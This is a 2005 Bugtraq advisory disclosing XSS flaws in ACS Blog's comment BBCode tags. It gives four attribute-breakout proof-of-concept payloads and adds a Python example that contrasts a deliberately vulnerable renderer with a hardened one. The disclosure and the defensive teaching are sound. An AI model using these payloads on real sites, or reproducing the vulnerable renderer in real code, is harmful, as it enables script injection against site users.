Multiple XSS vulnerabilities in ACS Blog

From: Dan Crowley (dan.crowley_at_gmail.com)
Date: 03/28/05

    Date: 28 Mar 2005 21:26:23 -0000
    To: bugtraq@securityfocus.com

    These vulnerabilities have been tested on the latest version of ACS Blog (v1.1.1).

    In the comments section of ACS Blog, it is possible to execute an XSS attack through the [link], [mail], and [img] tags, due to lack of filtering of single quotes and spaces inside the tags.

    Examples/PoCs:

    [link=http://www.google.com' onmouseover='alert("XSS vulnerability")' o=']Don't you wanna see where this link goes?[/link]

    [mail=bugtraq@securityfocus.com' onmouseover='alert("XSS vulnerability")' o=']Mr. Wiggles[/mail]

    [img]http://www.example.com/image.jpg' onload='alert("XSS vulnerability")' o='[/img]

    [link=http://www.google.com target=_blank' onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]

    ----------
    Vendor responded within 2 hours of notification, notified users with the security alert on its main page, and patched the vulnerabilities within another couple of hours.
    ----------

    Cheers,
    Dan
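
The bug class the post describes, as an added example that is not ACS Blog's own code: a naive regex-based BBCode renderer that drops the tag argument straight into a single-quoted attribute (so a single quote followed by a space ends the attribute and the rest becomes `onmouseover=`/`onload=` handlers), beside a hardened renderer that allowlists the URL scheme, rejects whitespace and quotes in the argument, HTML-escapes all plain text, and double-quotes attributes. The tag patterns, function names and the e-mail regex are assumptions; the payloads are the post's own PoCs reused as test input. The hardened version goes slightly beyond the post's finding in that the scheme allowlist also refuses `javascript:` URLs, which the post does not mention.

```python
"""Vulnerable vs. hardened BBCode rendering for [link], [mail] and [img].

Added illustration of the attribute-injection bug described in the post; this
is not ACS Blog's code, and the tag patterns and helper names are assumptions.
"""
import html
import re
from urllib.parse import urlsplit

# The post's PoC payloads, reused here as constructed test input.
PAYLOADS = [
    "[link=http://www.google.com' onmouseover='alert(\"XSS vulnerability\")' o=']"
    "Don't you wanna see where this link goes?[/link]",
    "[mail=bugtraq@securityfocus.com' onmouseover='alert(\"XSS vulnerability\")' o=']"
    "Mr. Wiggles[/mail]",
    "[img]http://www.example.com/image.jpg' onload='alert(\"XSS vulnerability\")' o='[/img]",
    "[link=http://www.google.com target=_blank' onmouseover=a=/Vulnerability/;alert(a.source) o=']"
    "Hooray[/link]",
]


def render_vulnerable(text):
    """Naive substitution of the kind the advisory describes (assumed, not ACS Blog's).

    The tag argument goes straight into a single-quoted attribute, so a ' in it
    terminates the attribute and everything after it becomes new attributes.
    """
    text = re.sub(r"\[link=(.*?)\](.*?)\[/link\]", r"<a href='\1'>\2</a>", text)
    text = re.sub(r"\[mail=(.*?)\](.*?)\[/mail\]", r"<a href='mailto:\1'>\2</a>", text)
    text = re.sub(r"\[img\](.*?)\[/img\]", r"<img src='\1'>", text)
    return text


ALLOWED_SCHEMES = {"http", "https"}
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
TAG_RE = re.compile(
    r"\[link=(?P<link>[^\]]*)\](?P<link_body>.*?)\[/link\]"
    r"|\[mail=(?P<mail>[^\]]*)\](?P<mail_body>.*?)\[/mail\]"
    r"|\[img\](?P<img>.*?)\[/img\]",
    re.S,
)


def safe_url(raw):
    """Return raw if it is a plain http(s) URL with no whitespace or quotes, else None."""
    if any(ch in raw for ch in " \t\r\n'\"<>"):
        return None
    parts = urlsplit(raw)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None  # also refuses javascript:, data: and scheme-less values
    return raw


def attr(value):
    """Double-quote an attribute value and escape &, <, >, \" and ' inside it."""
    return '"' + html.escape(value, quote=True) + '"'


def _render_tag(m):
    # A tag whose argument fails validation is dropped; its visible text is kept (escaped).
    if m.group("link") is not None:
        url, body = safe_url(m.group("link")), html.escape(m.group("link_body"))
        return body if url is None else "<a href=" + attr(url) + ">" + body + "</a>"
    if m.group("mail") is not None:
        addr, body = m.group("mail"), html.escape(m.group("mail_body"))
        if not EMAIL_RE.match(addr):
            return body
        return "<a href=" + attr("mailto:" + addr) + ">" + body + "</a>"
    url = safe_url(m.group("img"))
    return html.escape(m.group("img")) if url is None else "<img src=" + attr(url) + ">"


def render_hardened(text):
    """Escape all plain text and only emit tags whose argument passes validation."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        out.append(_render_tag(m))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


def injected_handlers(rendered):
    """Names of on* attributes that ended up inside a tag (approximate regex check)."""
    return re.findall(r"<[^>]*?\son(\w+)=", rendered)


if __name__ == "__main__":
    for p in PAYLOADS:
        print("vulnerable:", render_vulnerable(p), injected_handlers(render_vulnerable(p)))
        print("hardened:  ", render_hardened(p))
        print()
```

Escaping the attribute value alone would already close the hole the post reports, since the injected `'` could then no longer terminate `href`; the whitespace/quote rejection and the scheme allowlist are there so that an argument that is not a plausible URL or address never reaches the attribute at all.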

